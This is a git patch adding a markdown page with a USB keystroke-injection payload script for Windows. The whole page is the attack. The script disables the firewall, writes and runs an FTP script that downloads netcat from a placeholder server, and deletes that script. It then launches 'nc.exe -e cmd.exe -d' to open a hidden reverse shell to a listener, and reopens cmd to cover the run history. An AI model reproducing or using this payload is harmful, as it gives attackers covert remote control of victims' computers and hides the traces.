From c93000ee6a7752621d87cb6c8328f7d1681a8383 Mon Sep 17 00:00:00 2001
From: Vinicius <viniciuscsoliveira@hotmail.com>
Date: Thu, 2 Mar 2017 16:47:37 -0300
Subject: [PATCH] Payload netcat FTP download and reverse shell

---
 ...d-netcat-FTP-download-and-reverse-shell.md | 56 +++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 Payload-netcat-FTP-download-and-reverse-shell.md

diff --git a/Payload-netcat-FTP-download-and-reverse-shell.md b/Payload-netcat-FTP-download-and-reverse-shell.md
new file mode 100644
index 0000000..73a76b3
--- /dev/null
+++ b/Payload-netcat-FTP-download-and-reverse-shell.md
@@ -0,0 +1,56 @@
+This script will:
+* create an FTP script that logs you in to the FTP server and download netcat
+* delete the FTP script file
+* run netcat in daemon mode
+* run cmd.exe one more time to conceal the command we used in the run history.
+
+Fill in the required information where you see the brackets.
+```c
+DELAY 10000
+GUI r
+DELAY 200
+STRING cmd
+ENTER
+DELAY 600
+STRING cd %USERPROFILE%
+ENTER
+DELAY 100
+STRING netsh firewall set opmode disable
+ENTER
+DELAY 2000
+STRING echo open [IP] [PORT] > ftp.txt
+ENTER
+DELAY 100
+STRING echo [USERNAME]>> ftp.txt
+ENTER
+DELAY 100
+STRING echo [PASSWORD]>> ftp.txt
+ENTER
+DELAY 100
+STRING echo bin >> ftp.txt
+ENTER
+DELAY 100
+STRING echo get nc.exe >> ftp.txt
+ENTER
+DELAY 100
+STRING echo bye >> ftp.txt
+ENTER
+DELAY 100
+STRING ftp -s:ftp.txt
+ENTER
+STRING del ftp.txt & exit
+ENTER
+DELAY 2000
+GUI r
+DELAY 200
+STRING nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe -d
+ENTER
+DELAY 2000
+GUI r
+DELAY 200
+STRING cmd
+ENTER
+DELAY 600
+STRING exit
+ENTER
+```
\ No newline at end of file